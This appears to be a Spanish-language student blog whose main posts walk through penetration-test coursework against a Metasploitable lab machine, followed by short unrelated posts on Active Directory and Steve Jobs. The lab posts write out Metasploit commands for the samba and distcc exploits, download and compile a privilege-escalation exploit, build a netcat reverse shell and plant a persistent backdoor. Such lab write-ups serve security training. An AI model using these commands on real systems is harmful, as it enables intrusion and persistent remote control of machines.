actividad 6

  • Primero limpiamos los módulos de browser, esto se logra en la consola de armitage dando clic en la barra de comandos que aparece en la parte inferior del despliegue de carpetas.
  • Esto lo que hace es restaurar por defecto los módulos como se muestra a continuación.
  • Para crear un archivo ejecutable para Linux realizamos lo siguiente

payload/linux/x86/shell_reverse_tcp; en este caso utilizaremos el puerto 1234, y adicionalmente lo dejaremos como elf (esto actúa como si fuera una extensión del archivo el cual significara que es ejecutable)

  • Después de hecho esto lo guardaremos en la carpeta de root como backdoor que significa puerta trasera.
  • Ahora colocaremos a escuchar el puerto 1234 en el Armitage de la siguiente manera:

Armitage/listeners/reverse

  • Ahora ingresaremos a la maquina victima como root , para esto daremos clic derecho sobre la imagen del equipo victima attack/samba/usermap_script
🙂
🙂
  • Ya vulneramos la maquina y estamos como root; ahora procederemos a cargar el backdoor o puerta trasera de la siguiente manera.
  • O también se puede ejecutar desde la shell dando clic derecho en sima de la shell.
  • Ahora precederemos a realizar los siguientes comandos en la shell ejecutada en la victima.

Nota: para comprobar que funciona nuestro archivo ejecutable, deberemos de serrar las shell que están abiertas en el backtrack así: sessions -K

  • Procedemos a reiniciar la maquina víctima para ver si carga el backdoor creado en la víctima.

Nota: si muestra algún error relacionado con el backdoor estará identificado pero si no muestra nada estará cargado perfectamente.

  • Usuario:msfadmin Contraseña: msfadmin
  • Como podemos apreciar automáticamente fue vulnerada la maquina víctima.
Para realizar esta actividad nos tomamos un tiempo aproximado de 4 horas

Anuncios

Actividad 4

Documente al menos 2 casos de éxito.

Si ninguna de las vulnerabilidades elegidas en el punto anterior es usable, intente con nuevas vulnerabilidades.

Las aplicaciones escogidas a vulnerar fueron samba y distcc.

Actividad 5

Eleve privilegios en la maquina objetivo y obtenga una consola como root.

    • Use un exploit para escalar privilegios, siempre y cuando en el paso anterior no haya adquirido una consola como root..
    • Extraiga información sensible del objetivo (contraseñas de usuarios locales, credenciales de aplicaciones, cuentas de usuario en bases de datos, documentos de usuarios del sistema. etc.).

Comenzaremos entonces a tratar de vulnerar Samba.

El programa para realizar nuestra intrusión sera el BackTrack (bt), mas específicamente la aplicación msf3 que se encuentra dentro de el bt.

Lo primero que haremos sera ingresar ala consola del msf3; para esto abriremos la consola del bt y nos ubicaremos en el directorio msf3

# cd /opt/metasploit/msf3/

  • Y alli usaremos la opcion msfconsole # msfconsole
  • Tras ejecutar el comando se ingresara a un modo consola exclusivo para las opciones de msf
    • Ya allí usaremos la vulnerbilidad encontrada en el paso anterior para intentar conseguir acceso a una shell, si lo conseguimos y nuestra shell es de root no necesitaremos elevar privilegios. Usaremos entonces el exploit usermap_script

msf > use exploit/multi/samba/usermap_script

  •  Al ejecutar esto veremos que el inicio de nuestra linea de comandos cambia quedando de la siguiente manera

msf exploit(usermap_script)>

      •  Ahora miraremos cuales son las opciones que debemos ingresar para que nuestro exploit funcione

msf exploit(usermap_script)> show options

  • Allí se nos pide que ingresemos el RHOST que es la dirección de la maquina objetivo

msf exploit(usermap_script)> set RHOST (direccion de la maquina objetivo)

  • al realizar esto veremos de nuevo con show options que estas han cambiado

  • Procedemos entonces a ejecutar el exploit

msf exploit(usermap_script)> exploit

  • tras la ejecución de nuestro exploit en la ultima linea nos dicen que una sesión a sido abierta inmediatamente después de esto estaremos en una shell en la maquina objetivo, lo siguiente sera saber con que usuario se ha abierto nuestra sesión usaremos el comando id
  • lo hemos conseguido, la sesión que se ha abierto en nuestro caso es una session de root así que no necesitaremos elevar privilegios.

Continuaremos entonces a vulnerar nuestra segunda aplicación distcc, esto lo haremos también en el msf; estando allí haremos una búsqueda de los exploits realizables para esta aplicación

msf> search distcc

  • usaremos el exploit encontrado

msf> use exploit/unix/misc/distcc_exec

  • Igual que con la aplicación anterior cambiara la linea de comandos

msf exploit(distcc_exec)>

  • Procedemos entonces a mirar cuales opciones tenemos disponibles

msf exploit(distcc_exec)> show options

  • Como en la aplicación anterior colocaremos el RHOST

msf exploit(distcc_exec)> set RHOST 192.168.10.129

  • Ahora usaremos el payload de nuestra conveniencia primero buscaremos que payloads tenemos disponibles

msf exploit(distcc_exec)> show payloads

  • Nosotros usaremos el payload

msf exploit(distcc_exec)>set payload cmd/unix/bind_ruby

  •  Y procedemos a ejecutar el exploit

msf exploit(distcc_exec)>exploit

  • Observamos que se ha abierto una sesión, ya en esta usaremos el comando id para ver con que usuario nos hemos logueado
  • Nuestro siguiente paso sera la elevación de privilegios; en este paso lo que haremos sera descargar el exploit pertinente para realizar este tipo de procesos (este fue buscado con anterioridad todo depende de lo que se busque hacer en la maquina objetivo).

Wget http://www.exploit-db.com/download/8572

  • El archivo seleccionado fue el que ha sido descargado, nuestro siguiente paso sera re nombrarlo, luego haré un listado de los archivos para que observen el cambio

mv index.html exploit.c

  • Lo que haremos a continuación sera compilar el exploit en la maquina víctima

gcc exploit.c -o exploit

  • Ahora abriré otra consola de bt y la pondré a escuchar por el puerto 4444

root@bt:/opt/metasploit/msf3# netcat -vlp 4444

  • Nuestro siguiente paso sera crear un script que me permita la ejecución de acciones como root aprovechándonos de las bondades de nuestro exploit, esto se realizara en la shell que tenemos abierta como deamon

echo ‘#!/bin/sh’ > /tmp/run

  • Ahora creare una sesión de netcat para la maquina bt usando el siguiente comando

echo ‘/bin/netcat -e /bin/sh 192.168.10.146 4444’ >> /tmp/run

  • Checkiamos que el proceso halla sido abierto atravez del comando

ps -edf | grep udev

  • En la imagen se puede observar que si se ha creado el proceso; la formula ahora sera tomar el id del proceso y restarlo por el numero del udev en este caso 2540 – 1 y ejecutar el exploit

./exploit 2539

  •  Y observaremos como en la consola que teníamos escuchando por el puerto 4444 del bt se nos abre una sesión automáticamente
  • Hemos logrado obtener a una shell de root 🙂 ….
para esto utilizamos un tiempo aproximado de 5 horas

Actividad 3.

Realice una búsqueda de vulnerabilidades de los servicios y aplicaciones encontrados en el punto anterior.

Elija sus objetivos específicos (aplicaciones, servicios, etc)

Para este punto utilizaremos una herramienta nueva llamada Armitage

  • Daremos clic en la opción HostsNmap Scanintense Scan en azul, resaltamos los objetivos a explotar.

Realice búsquedas de vulnerabilidades en motores de búsqueda, listas de seguridad oficiales del fabricante, listas de seguridad reconocidas, scaners de vulnerabilidades, underground, etc.

Haga un listado con 10 vulnerabilidades elegidas y documentales (tipo de vulnerabilidad, nivel de criticidad de la vulnerabilidad, descripción, versiones vulnerables, etc).

  • El tiempo que se requirió para realizar este punto fue aproximadamente de 12 horas.

Actividad 2.

Identifique los servicios y aplicaciones de red ejecutándose en la máquina objetivo.

Encuentre la máquina en la red

Para este punto utilizaremos la herramienta nmapsP (la opcion sP, sirve para un escaneo con ping y solo nos mostrara las ip de las maquinas encontradas) mas la red en la cual se encuentra la maquina a explotar (192.168.10.129).

El sistema que utilizaremos para realizar estas actividades sera el Back Track (este software sirve para encontrar y explotar vulnerabilidades de un sistema determinado con sus respectivos servicios).

escanee sus puertos de red

Para el escaneo de los puertos utilizaremos nmap -sN (con -sN, nos mostrara los servicios, puertos y protocolo el cual utiliza cada uno)

identifique los servicios y aplicaciones

Para el escaneo de los puertos utilizaremos nmap -sV (la variacion con el anterior comando es que muestra la version del servicio que corre en el momento a menos de que esté protegido)

  • El tiempo utilizado para este procedimiento fue aproximadamente de 3 hora y media; mientras se instalo el Back Track 5 el cual requiere un tiempo para su descarga y se puede realizar la descarga desde http://www.backtrack-linux.org/downloads/

Objetivos específicos:
● Reconocer los elementos técnicos necesarios para ejecutar una prueba de intrusión.

● Identificar cada uno de los pasos para ejecutar una prueba de intrusión

● Identificar las herramientas comunes empleadas en una prueba de intrusión
● Identificar las estrategias y destrezas básicas para la ejecución de una prueba de
intrusión

Actividad 1.

Despliegue el ambiente virtualizado “metasploitable”

  • este ambiente fue descargado, del ftp://192.168.10.66 ip que no puede ser usada para la descarga ya que este tutoría fue realizado en un ambiente de red interna, recuerde que la maquina puede ser encontrada en muchos espacios en internet.
  • El primer paso es descomprimir el archivo para poder ser instalado en VirtualBox.
  • Estando en VirtualBox, daremos clic en la opción NUEVA, colocamos nombre y como sistema operativo usaremos la opción otro y como versión otro. 
  • Le asignamos 512 de RAM.

  • Como disco debemos de seleccionar la segunda opción, adicional mente a esto buscaremos la carpeta en la cual se encuentra dicho disco.

  • Terminando con crear.

Nota: si al ejecutar esta maquina presentara algun error deberemos de entrar a ConfiguraciónSistema y habilitar las opciones IO APIC, y la opción reloj hardware en tiempo UTC.

  • El tiempo implementado para este proceso fue aproximadamente de 1 hora.

Active Directory

Publicado: 1 de noviembre de 2011 en Tutoriales para CISCO

El servicio de directorio se encarga de administrar todos los objetos del sistema de red. En versiones anteriores de windows server se utilizo el Active Directory para esta tarea, pero en windows server 2008 se utiliza Active Directory Domain Services.

y se administran centralmente a traves del Server Manager.

el siguiente es un archivo con los componentes básicos del Active Directory

MUERE UNA MENTE BRILLANTE….

Publicado: 6 de octubre de 2011 en Noticias

Steve Paul Jobs nace en san francisco california el 24 de febrero 1955….. muere en los angeles california el 5 de octubre del 2011. fue un visionario y magnate de los negocios informaticos, fue cofundador de la empresa APPLE INC. en el año de 1976 con su amigo de la adolescencia  Steve Wozniak, naciendo este proyecto en el garaje de su casa. fue una persona exitosa desde el punto de vista que usted lo mire, a los 26 años ya era millonario y en la actualidad ocupaba el puesto 110 en las  listas de grandes fortunas del mundo (8.300 millones de dolares).   Un pensamiento al futuro.En 1984 crean la Macintoch 128k, siendo asi el primer ordenador personal con entorno grafico y raton, en vez de la linea de comandos. Transformo la industria musical, lanzando el IPOD en el 2001 y en el 2003 la tienda online de itunes que en 7 años vendio mas de 10.000 millones de canciones y domino total mente el negocio online, de la musica. Fundador de Pixar Animation Studios, la cual compro por 10 millones de dolares llamada anteriormente The Graphics Group una subsidiaria de Lucasfilm espacializada en la reproducion de graficos por computadora. A sus 30 años de edad funda la NeXT Computer Inc, con una inversion de 7 millones de dolares. En enero de 2011 lanzaron ipad2 con rotundo exito en ventas

VIDA PERSONAL

Estuvo casado en 1991 con Laurene Powell, vivieron en palo alto california y tubieron 3 hijos;

Tuvo una hija extra llamada lisa, de una relacion de su juventud con Arlenne Brennan, sufrio varios problemas graves de salud.

En el 2004 se le diagnostica cancer de pancreas la cual fue tratada y curada en una clinica de california.

A principios del 2009 anuncia padecer un desequilibrio hormonal, apartandoce de la compañia dejando como responsable a Timothy Cook.

En abril del 2009 se somete a un transplante de higado; en septiembre del mismo año regresa a sus labores.

El 17 de enero del 2011 deja nuevamente la compañia por problemas de salud.

SU MUERTE.

Fallece el 5 de octubre del 2011 a sus 56 años, por causa de un severo cancer de pancreas.

RECONOCIMIENTOS

1985, condecorado con la medalla nacional de tecnologia.

2004, premio a los visionarios en los Billboard de Entretenimiento Digital.

El 27 de noviembre del 2007 fue nombrado como la persona mas poderosa segun la revista fortune.

El 5 de diciembre del 2007 el gobernador de california le incluyo en el salon de la fama de california.

En octubre del 2009 fue elegido empresario de la decada por la revista fortune.

En diciembre del 2009 fue elegido director ejecutivo del año por la revista Harvard Business Review

TOMADO DE:

WIKIPEDIA